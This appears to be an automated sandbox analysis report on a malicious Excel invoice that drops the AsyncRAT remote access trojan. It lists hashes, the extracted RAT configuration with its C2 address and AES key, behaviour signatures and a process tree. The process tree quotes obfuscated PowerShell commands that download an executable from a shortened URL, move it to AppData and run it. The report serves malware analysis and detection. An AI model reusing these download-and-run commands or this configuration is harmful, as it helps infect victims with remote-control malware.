asyncrat | b353116f931196bc449483113b61ac01a50bd35b24569cb79919cec26dc6d535

General

Target

PROFORMA INVOICE INV-1.xls
Size

66KB
MD5

53a8387449c7201a5d07f1a065d9e789
SHA1

7fb04159123617c551cbe189cccd6d0c9fe179ae
SHA256

b353116f931196bc449483113b61ac01a50bd35b24569cb79919cec26dc6d535
SHA512

fc54e553c2299eaf386bbad998b2d3a11f7cd613e2807958f5e2c5631b3e8a05531f2c3bf21d02efbbe21bb23e4703e27d49c1d018e8ca919c16df6b1f9ee8ee

Score

10^/10

rat asyncrat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://tinyurl.com/yxbf64lf

Extracted

Family

asyncrat

Version

0.5.7B

C2

185.165.153.249:4371

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
4lpLfCzV6wCkayaT0MjD3qp2ZVBd759O
anti_detection
false
autorun
false
bdos
false
delay
Default
host
185.165.153.249
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
4371
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4332	4756	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4348	4756	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4356	4756	cmd.exe	EXCEL.EXE

ServiceHost packer 5 IoCs

Detects ServiceHost packer used for .NET malware

Processes:

resource	yara_rule
behavioral2/memory/196-35-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/196-37-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/196-36-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/196-38-0x0000000000000000-mapping.dmp	servicehost
behavioral2/memory/196-39-0x0000000000000000-mapping.dmp	servicehost

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

16 3964 powershell.exe
18 3964 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

ye.exeye.exe

pid process

196 ye.exe
3224 ye.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

ye.exe

pid process

196 ye.exe
196 ye.exe
196 ye.exe
196 ye.exe
196 ye.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

ye.exe

description pid process target process

PID 196 set thread context of 3224 196 ye.exe ye.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1120 196 WerFault.exe ye.exe

flow	pid	process
16	3964	powershell.exe
18	3964	powershell.exe

pid	process
196	ye.exe
3224	ye.exe

pid	process
196	ye.exe
196	ye.exe
196	ye.exe
196	ye.exe
196	ye.exe

description	pid	process	target process
PID 196 set thread context of 3224	196	ye.exe	ye.exe

pid	pid_target	process	target process
1120	196	WerFault.exe	ye.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4756 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exepowershell.exepowershell.exeye.exeWerFault.exe

pid	process
3236	powershell.exe
620	powershell.exe
3964	powershell.exe
620	powershell.exe
3236	powershell.exe
620	powershell.exe
3236	powershell.exe
3964	powershell.exe
3964	powershell.exe
196	ye.exe
196	ye.exe
196	ye.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe
1120	WerFault.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exeye.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	3236	powershell.exe
Token: SeDebugPrivilege	620	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	196	ye.exe
Token: SeRestorePrivilege	1120	WerFault.exe
Token: SeBackupPrivilege	1120	WerFault.exe
Token: SeDebugPrivilege	1120	WerFault.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	process
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE
4756	EXCEL.EXE

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.exepowershell.exeye.exe

description	pid	process	target process
PID 4756 wrote to memory of 4332	4756	EXCEL.EXE	cmd.exe
PID 4756 wrote to memory of 4332	4756	EXCEL.EXE	cmd.exe
PID 4756 wrote to memory of 4348	4756	EXCEL.EXE	cmd.exe
PID 4756 wrote to memory of 4348	4756	EXCEL.EXE	cmd.exe
PID 4756 wrote to memory of 4356	4756	EXCEL.EXE	cmd.exe
PID 4756 wrote to memory of 4356	4756	EXCEL.EXE	cmd.exe
PID 4348 wrote to memory of 620	4348	cmd.exe	powershell.exe
PID 4348 wrote to memory of 620	4348	cmd.exe	powershell.exe
PID 4356 wrote to memory of 3236	4356	cmd.exe	powershell.exe
PID 4356 wrote to memory of 3236	4356	cmd.exe	powershell.exe
PID 4332 wrote to memory of 3964	4332	cmd.exe	powershell.exe
PID 4332 wrote to memory of 3964	4332	cmd.exe	powershell.exe
PID 3236 wrote to memory of 196	3236	powershell.exe	ye.exe
PID 3236 wrote to memory of 196	3236	powershell.exe	ye.exe
PID 3236 wrote to memory of 196	3236	powershell.exe	ye.exe
PID 196 wrote to memory of 3224	196	ye.exe	ye.exe
PID 196 wrote to memory of 3224	196	ye.exe	ye.exe
PID 196 wrote to memory of 3224	196	ye.exe	ye.exe
PID 196 wrote to memory of 3224	196	ye.exe	ye.exe
PID 196 wrote to memory of 3224	196	ye.exe	ye.exe
PID 196 wrote to memory of 3224	196	ye.exe	ye.exe
PID 196 wrote to memory of 3224	196	ye.exe	ye.exe
PID 196 wrote to memory of 3224	196	ye.exe	ye.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE INV-1.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4756

C:\Windows\SYSTEM32\cmd.exe
cmd /k p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxbf64lf'),'ye.exe')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxbf64lf'),'ye.exe')
3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Windows\SYSTEM32\cmd.exe
cmd /k p^ower^shell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620

C:\Windows\SYSTEM32\cmd.exe
cmd /k po^wer^shell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3236

C:\Users\Admin\AppData\Roaming\ye.exe
"C:\Users\Admin\AppData\Roaming\ye.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:196

C:\Users\Admin\AppData\Roaming\ye.exe
"C:\Users\Admin\AppData\Roaming\ye.exe"
5⤵
- Executes dropped EXE
PID:3224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 896
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8493230a82a2d4feba6160f79c301470

SHA1
33e1a17ae1d48172959c4a6458daaeff2bc8463c

SHA256
a60b14883523d776ef31d5f88a1c9feb7811504ed28a6a4fc7237fab20c38ee8

SHA512
7b481b5912f46e90f733f9d735139482609d36783920529ca1028cce9fd8554aa56bb3064f0b9230c5aa0297b91e9fdee835c53c1337eef8df945b1dddf3ae18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8d04343a3598c72eaa9fbb53faf13467

SHA1
fe730469384b244b76e65fb22e7811bb58c655f5

SHA256
197db7b97fd18ccd2e3308240047ff3be499f25f8aff568605bde2328134c128

SHA512
7db608f094ddff4f43550afbccc1d7a74b1aed09549e4e198e953f0b74df813ef1d408ce42e41a0b7f1b89942fac56049e8d1d40addafc8935476f5698e2ace1

Download Submit
C:\Users\Admin\AppData\Roaming\ye.exe
MD5
c7fb5824488e31a95ace8792feb44dfc

SHA1
17af3089f7d8afbd58ac3ba1e699b10f7b58c50a

SHA256
0ad8e244f541e14eb098c8e6f8eba6e2a5cffdf517fe512b85a92c70511bb3bf

SHA512
0b6acedb4e150f6fa3122a80b62517424ff809df5a662cfaa3bf0cb2288b110921726fc29a7732f6ee03bfc029cefb383586608f02a87c9919d4f7877cbd423a

Download Submit
C:\Users\Admin\AppData\Roaming\ye.exe
MD5
c7fb5824488e31a95ace8792feb44dfc

SHA1
17af3089f7d8afbd58ac3ba1e699b10f7b58c50a

SHA256
0ad8e244f541e14eb098c8e6f8eba6e2a5cffdf517fe512b85a92c70511bb3bf

SHA512
0b6acedb4e150f6fa3122a80b62517424ff809df5a662cfaa3bf0cb2288b110921726fc29a7732f6ee03bfc029cefb383586608f02a87c9919d4f7877cbd423a

Download Submit
C:\Users\Admin\Documents\ye.exe
MD5
c7fb5824488e31a95ace8792feb44dfc

SHA1
17af3089f7d8afbd58ac3ba1e699b10f7b58c50a

SHA256
0ad8e244f541e14eb098c8e6f8eba6e2a5cffdf517fe512b85a92c70511bb3bf

SHA512
0b6acedb4e150f6fa3122a80b62517424ff809df5a662cfaa3bf0cb2288b110921726fc29a7732f6ee03bfc029cefb383586608f02a87c9919d4f7877cbd423a

Download Submit
memory/196-36-0x0000000000000000-mapping.dmp

Download
memory/196-39-0x0000000000000000-mapping.dmp

Download
memory/196-35-0x0000000000000000-mapping.dmp

Download
memory/196-26-0x0000000002C70000-0x0000000002C87000-memory.dmp

Filesize
92KB

Download
memory/196-37-0x0000000000000000-mapping.dmp

Download
memory/196-25-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/196-27-0x0000000005830000-0x0000000005831000-memory.dmp

Filesize
4KB

Download
memory/196-23-0x0000000000A10000-0x0000000000A11000-memory.dmp

Filesize
4KB

Download
memory/196-38-0x0000000000000000-mapping.dmp

Download
memory/196-19-0x0000000000000000-mapping.dmp

Download
memory/196-22-0x0000000073290000-0x000000007397E000-memory.dmp

Filesize
6.9MB

Download
memory/620-6-0x00007FFE8AB80000-0x00007FFE8B56C000-memory.dmp

Filesize
9.9MB

Download
memory/620-4-0x0000000000000000-mapping.dmp

Download
memory/620-12-0x0000022CECF90000-0x0000022CECF91000-memory.dmp

Filesize
4KB

Download
memory/1120-40-0x0000000005260000-0x0000000005261000-memory.dmp

Filesize
4KB

Download
memory/1120-34-0x0000000004BA0000-0x0000000004BA1000-memory.dmp

Filesize
4KB

Download
memory/3224-29-0x000000000040D06E-mapping.dmp

Download
memory/3224-28-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3224-31-0x0000000073290000-0x000000007397E000-memory.dmp

Filesize
6.9MB

Download
memory/3236-10-0x000001F6CAB70000-0x000001F6CAB71000-memory.dmp

Filesize
4KB

Download
memory/3236-7-0x00007FFE8AB80000-0x00007FFE8B56C000-memory.dmp

Filesize
9.9MB

Download
memory/3236-5-0x0000000000000000-mapping.dmp

Download
memory/3964-9-0x00007FFE8AB80000-0x00007FFE8B56C000-memory.dmp

Filesize
9.9MB

Download
memory/3964-8-0x0000000000000000-mapping.dmp

Download
memory/4332-1-0x0000000000000000-mapping.dmp

Download
memory/4348-2-0x0000000000000000-mapping.dmp

Download
memory/4356-3-0x0000000000000000-mapping.dmp

Download
memory/4756-0-0x00007FFE92450000-0x00007FFE92A87000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads